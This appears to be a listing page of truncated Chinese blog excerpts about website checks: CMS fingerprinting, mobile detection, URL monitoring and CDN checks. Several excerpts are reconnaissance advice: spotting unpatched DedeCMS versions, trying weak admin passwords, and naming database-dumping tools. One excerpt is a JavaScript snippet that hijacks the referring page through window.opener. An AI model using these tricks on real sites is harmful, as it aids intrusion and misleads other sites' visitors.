1.robots.txt文件 robots.txt文件我们写过爬虫的就知道,这个文件是告诉我们哪些目录是禁止爬取的.但是大部分的时候我们都能通过robots.txt文件来判断出cms的类型 如: 从wp路径可以看出这个是WordPress的cms 这个就比较明显了直接告诉我们是PageAdmin cms 也有些robots.txt里面写得不是很清楚.我们看看织梦的 从robots.txt不能直接看出来是什么cms,我们就直接把他复制到百度去查询 这样就找到了是织梦的cms 2.通过版权信息进行查…

php或js判断网站访问者来自手机或者pc机 2013年9月26日,在弄wtuonline的时候为了区分用户是来自手机版浏览器还是pc,针对不同平台选择不同的网站版本,最终总结如下:         一.JS版代码: <!--切换手机版网站---> <script src="http://siteapp.baidu.com/static/webappservice/uaredirect.js" type="text/javascript">&…

php或js判断网站访问者来自手机或者pc机 2013年9月26日,在弄wtuonline的时候为了区分用户是来自手机版浏览器还是pc,针对不同平台选择不同的网站版本,最终总结如下:         一.JS版代码: <!--切换手机版网站---> <script src="http://siteapp.baidu.com/static/webappservice/uaredirect.js" type="text/javascript">&…

我使用的是控制台应用程序来监控网站的运行状态,通过判断网站请求头(HEAD)来判断是否运行正常 下面列出几种常见的网站状态码 StatusCode 数字表示 OK 200. OK 指示请求成功,且请求的信息包含在响应中.这是最常接收的状态代码 NotFound 404  NotFound 指示请求的资源不在服务器上. InternalServerError 500  InternalServerError 指示服务器上发生了一般错误 还有其他的状态码可以参考 http://www.cnblogs…

该脚本比较简单,判断网站根目录是否被篡改,如果被篡改把篡改的文件发送到管理员邮箱 #!/bin/bash #author:luodi date:// #use md5 to check web site . /etc/init.d/functions #var setting WEBDIR=/var/www/html/web/ KEY=md5key #to determine whether a file exists [ -e $WEBDIR ] || exit [ -f $KEY ] ||…

php判断网站收录情况 <?php //检测网页是否被百度收录 function checkBaiduIndex($url){ $url='http://www.baidu.com/s?wd='.$url; $curl=curl_init(); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); $rs=curl_exec($curl); curl_close($curl); if(!…

这个方法可以判断出目标网站所使用的织梦DedeCms是哪个版本的,打了哪一天的补丁. 在需要判断网站织梦版本的的URL路径后面添加/data/admin/ver.txt 如官方的:http://www.dedecms.com/data/admin/ver.txt 附加历史更新: 2010-08-18 安全更新 2010-08-03 安全更新 20100708是最新版本5.6 20100324是5.5 20100429之后都是5.6版本,对应的日期为补丁的日期,可以知道什么漏洞没补 5.6版本更新…

最近了解了几款国外开源CMS,与现有国内客户需求及业务习惯,结论如下:1.国人的习惯,有后台管理和会员管理2种,而老外大部分开源系统都是一个管理即前台管理,而且大部分架构是固定死的,如果在想抽出一个后台框架管理,较难且工作量较多, 而且国内客户都习惯于前后分开,如果让客户在前台管理网站,他们基本都会是抵制的太和直接拒绝.2.外国人不太重视权限,比如某栏目某专题的权限是否某会员拥有,或者是一些细节的权限设置,国外的开源cms基本没有这些,大概外国人和国内人,理解的不一样吧,如果你要做这些工作量很大…

GFW:Greate Firewall Of China中国防火长城: 描述: 1.今天所属的一个域名被告诉不能访问了,赶紧自己测试了一下,发现可以,然后对方试了下说是不行,然后仔细按对方说的一步步操作,果然是不能访问了: 2.过了一会网站又可以访问了——间歇性屏蔽 3.原因是访问某个页面,再那个页面进行搜索了一个词,导致整个IP被屏蔽 判断是否被墙的过程: 1.ping域名可以ping通,就是访问不了 2.可能公司内可以访问外网的原因,让朋友在他那试一下发现ping不通: 3.使用linux常…

很多时候也可以通过逻辑程序来进行判断,如PHP.JS是常用的两种识别访问设备类型的常用方法. 原理都是采用识别访问客户端的HTTP_USER_AGENT,然后进行关键字匹配进行确定设备类型,对于伪造HTTP头的就区分不出来了. 区分设备类型然后要做的就是能够针对不同设置显示出易于阅读的网页,具体可以研究响应式布局技术. 本文主要介绍如何通过php或js来识别终端类型. <?php class IsMobile { public static function isMobile() { $user…

我们可以在网站的首页加上一段JavaScript代码对用户的浏览器进行判断,从而显示不同的网址,代码如下: <script type="text/javascript"> if (window.location.toString().indexOf('pref=padindex') != -1) {} else { if (/AppleWebKit.*Mobile/i.test(navigator.userAgent) || (/MIDP|SymbianOS|NOKIA|S…

参考网站:http://www.cnblogs.com/junny/archive/2012/10/30/2745978.html public bool CheckUrlVisit(string url) { try { HttpWebRequest req = (HttpWebRequest)WebRequest.Create(url); HttpWebResponse resp = (HttpWebResponse)req.GetResponse(); if (resp.StatusCod…

代码如下: use HTTP::UserAgent; use JSON::Tiny; my $check-url = 'www.baidu.com'; #say @*ARGS[0]; #检测命令行参数 { ].lc; }else{ say 'no http/https, eg:'; say 'cms-check.p6 www.target.com'; exit; } my $url = 'http://120.24.44.134/yunxi-web/public/home/index'; #sa…

//判断是http还是https $http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://'; //全路径 $urls = $http_type . $_…

var url = ""; if(!string.IsNullOrEmpty(Model.WebsiteURL)){ url = Model.WebsiteURL.ToString(); url = url.Substring(, ).ToLower() == "http://" ? url : "http://" + url; } url=document.getElementById("url").value; url=u…

直接访问http://api.wipmania.com/jsonp 还有经纬度…

#!/bin/bash [ -f /etc/init.d/functions ] && . /etc/init.d/functions function usage(){ echo "USAGE:$0 url" exit 1 } RETVAL=0 function CheckUrl(){ wget -T 10 --spider -t 2 $1 &>/dev/null RETVAL=$? if [ $RETVAL -eq 0 ];then action &q…

最近有位朋友说他有很多网址,可能有些已经过期或者不能访问了.自己去一个一个点可以,但又很麻烦! 再过一段时间又要去检查一次,每次都这样就不方便了! 于是就做了个小程序给帮他检测一下. 以下做了一个例子作为参考: using System.Net; public bool CheckUrlVisit(string url) { try { HttpWebRequest req = (HttpWebRequest)WebRequest.Create(url); HttpWebResponse res…

if (this.txturl.Text == "") { this.lblmess.Text = "请输入网址"; } else { GetHttp getHttp = new GetHttp(); string url = "http://" + this.txturl.Text + "/uc_server/control/admin/db.php"; try { string httpWebRequest = getHt…

  wget http://www.shopindream.de/200.php --timeout=2 c_monitor=$? rm -rf 200.php if [ ! $c_monitor = "0" ]; then echo "# Error Cannot open shopindream.de, time: " $(date +"%y-%m-%d %H:%M:%S") "restart lnmp.. " | mai…

1.判断网站CMS类型 判断目标 使用工具: 脚本语言 wvs 御剑     domain明小子 操作系统 wwwscan 啊d pangolin(穿山甲) 搭建平台 站长工具 netpark    nmap  CMS厂商 whatweb googlehack   2.网站暴库漏洞 暴库,就是通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地.黑客非常乐意于这种工作,为什么呢?因为黑客在得到网站数据库后,就能得到网站管理账号,对网站进行破坏与管理,黑客也能通过数据库得到网站用户…

版权和内容说明: 这篇文章不是本站编写,是从网络上摘抄的,但是经过了本站的改写优化,并将内容,格式规范化. 本篇说明:这篇文章结合了前辈们前几年一路挖掘出来的主流程序漏洞以及思路, 小编写在前面是想让大家大致了解一下,因为<渗透课程>以后的内容,就是围绕着本篇所涉及的内容进行深度逻辑原理剖析. 这是一篇比较完全的基本渗透笔记.看不懂没关系,后面会一一讲解不过本章的内容读者们要尽量保存,可能会在拿站的时候应用到呢! 常见网站程序asp类: foosun(风讯) kesion(科汛) newasp…

今天学到了一些识别CMS的快速方法,也算是一种信息收集经验的积累,在这里要感谢一下我的同事“gakki的童养夫”对我的大力支持. 如何判断网站的CMS? robots.txt文件 robots.txt是网站用来防止爬虫爬取目录的文件,我们可以通过它来对CMS进行判断. 例:以下这种有很多/plus/目录的一般为织梦dedecms 织梦的默认后台地址为xxx.com/dede/login.php,这种站一般都是一键部署的,可以尝试一下弱口令. 有的站长会修改默认路径,用域名来代替也是有可能的,例:…

有的网站源码中加入了这几行代码: <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /> 或者是 <link rel=" icon" href="/favicon.ico" type="image/x-icon" /> 这样可以指定图标位置存放. 但现在的浏览器大多支持自动获取网站根…

判断网站来防IP是否为蜘蛛,用命令查询 :     一.在windows平台 蜘蛛反查命令:nslookup IP 点击"开始"-"运行"-"cmd"-"输入nslookup IP地址"-"回车" C:\>nslookup 203.208.60.203   查询结果如下: 总结:windows可以用nslookup命令反解ip来判断是否来自spider的抓取.   二.在linux平台 $ host…

有时候给网站做流量,免不了要做一些网站劫持的JS跳转,这里贴上一段劫持来源网站的JS跳转方法,很简单 <script> // 获取来源网站 var slyar = document.referrer; if(slyar.indexOf("qq")>0)// 判断网站是否来自腾讯网 // 劫持源网址跳转(这个就是让腾讯网跳转到指定的网站) window.opener.location.href = "http://www.我的域名.com"; //…

注意域名,动静分离的网站,只对静态文件的域名做了cdn 怎么看网站有没开启CDN? 要看一个网站是否开启CDN,方法很简单,只要在不同的地区ping网址就可以,比如在山东济南ping www.jb51.net 得到的IP地址是111.161.66.167,但在江苏地区ping www.jb51.net得到的IP确是61.147.92.111,像这样在不同地区ping同一个网址,得到不同的IP地址,那么这种情况就可以判断该网站开了CDN加速. 如果网站没有开启CDN,不同地区Ping网址是网站服务…

用dedecms织梦系统建站的童鞋,在遇见很喜欢的网站的时候总想知道人家的网站是用什么做的,怎么知道网站是不是dedecms建的呢?? 第一个方法: 可以直接在需要判断网站织梦版本的的URL路径后面添加/data/admin/ver.txt 如果显示是20130715类似的版本编号,那可以确定是织梦系统建的站 第二个方法:快速地站内搜索,间隔时间断一些,如果是dedecms建的站,会有一个默认提示,参见这篇文章: 修改织梦默认提示"dedecms提示信息!" 第三个方法: 直接查看目标…

该方法不局限于jQuery的检测,对与任何Javascript变量或函数都是通用的. 当前网页加载jQuery后,jQuery()或$()函数将会被定义,所以检测jQuery是否已经加载存在以下2种方法:方法1:代码如下: if (jQuery) { // jQuery 已加载 } else { // jQuery 未加载 } 方法2:代码如下: if (typeof jQuery == 'undefined') { // jQuery 未加载 } else { // jQuery 已加载 }…

很多站长总是抱着侥幸的心里,通过作弊的方式在搜索引擎上获得一定排名,以致于网站被百度和google封了,也就是所谓的被K站. 那么,要是网站被百度和Google封了,怎么办? 首先要确定你的网站已经被百度或google 封了.(如何判断网站是否被K站?) 谷歌从来都不会人工来检查或删除某一个网站,整个建立索引和排名的过程都用自动化的程序进行. 如果被百度封掉了,目前的办法是把任何可能涉及作弊的地方调整过来,然后再次提交网址, 接下来就是等待. 而谷歌提供了一个功能,你可以通过该功能把你的网址重新…